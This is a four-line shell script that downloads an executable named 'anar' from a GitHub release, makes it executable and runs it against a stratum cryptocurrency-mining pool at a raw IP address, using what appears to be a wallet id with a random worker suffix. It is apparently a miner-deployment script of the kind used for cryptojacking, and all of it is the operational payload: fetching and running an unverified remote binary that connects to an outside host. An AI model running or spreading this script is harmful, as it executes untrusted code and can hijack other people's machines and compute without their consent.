#!/bin/sh
apt update && apt install unzip -y
wget https://github.com/tallapallitech63/antx/releases/download/anaxc/anar
chmod +x anar
./anar -P stratum1+tcp://cb21065de322fb2bff1944936d0cf55bd02ae8968223.$(shuf -n 1 -i 1-99999)-anar@45.33.120.252:8085
